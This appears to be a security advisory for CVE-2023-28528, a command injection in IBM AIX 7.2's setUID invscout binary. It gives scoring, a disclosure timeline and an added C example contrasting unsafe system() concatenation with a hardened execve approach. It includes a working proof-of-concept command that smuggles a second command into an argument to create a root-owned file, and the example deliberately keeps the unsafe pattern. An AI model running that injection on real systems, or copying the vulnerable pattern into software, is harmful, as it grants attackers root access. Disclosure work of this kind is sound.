CVSS3: 8.4 High
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.002 Low (Percentile: 56.9%)
CVE-2023-28528
An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially crafted command-line argument can lead to the execution of a privileged operation. An attacker can supply such an argument to achieve arbitrary code execution.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - <http://us.ibm.com>
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed to system().
The most trivial method of exploitation to gain command execution takes the following form:
$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo "
package info-6.7-1.ppc is already installed
/var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm
$ ls -la /etc/pwned
-rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned
Note: The umask is set to 0 prior to exploitation commencing.
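To make the flaw concrete, the following is an added illustration (not IBM's code; the function names and the RPM_DIR constant are assumptions) of the unsafe concatenate-and-system() pattern described above, next to a hardened variant that constrains the file name and invokes rpm through an argument vector rather than a shell:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Trusted RPM directory; taken from the path shown in the advisory output. */
#define RPM_DIR "/var/adm/invscout/microcode"
/* Vulnerable pattern (hypothetical): caller-controlled values are pasted into
 * one string for system(), so a ';' ends the rpm command and starts another. */
int install_unsafe(const char *rpm, const char *opts) {
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "rpm %s %s/%s", opts, RPM_DIR, rpm);
    return system(cmd);
}

/* Hardened check: bare file name (no '/', so no traversal out of RPM_DIR),
 * conservative character set, ".rpm" suffix. Returns 1 if acceptable, else 0. */
int rpm_name_ok(const char *name) {
    size_t len = name ? strlen(name) : 0;
    if (len < 5 || len > 255 || strcmp(name + len - 4, ".rpm") != 0)
        return 0;
    if (name[0] == '.') return 0;       /* rejects ".." and dotfiles */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '+' && c != '-')
            return 0;                   /* ';', ' ', '/', '"' all fail here */
    }
    return 1;
}

/* Hardened install: validated name, fixed options, execve() with an argument
 * vector and minimal environment, so no shell ever parses the value.
 * Returns rpm's exit status, or -1 on rejection or failure. */
int install_safe(const char *rpm) {
    if (!rpm_name_ok(rpm)) return -1;
    char path[1024];
    snprintf(path, sizeof path, "%s/%s", RPM_DIR, rpm);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "rpm", "-i", path, NULL };
        char *envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/usr/bin/rpm", argv, envp);
        _exit(127);
    }
    int st;
    return (waitpid(pid, &st, 0) == pid && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}
```

The validation alone does not help if the result is still handed to system(); the argument vector is what keeps shell metacharacters inert.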
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.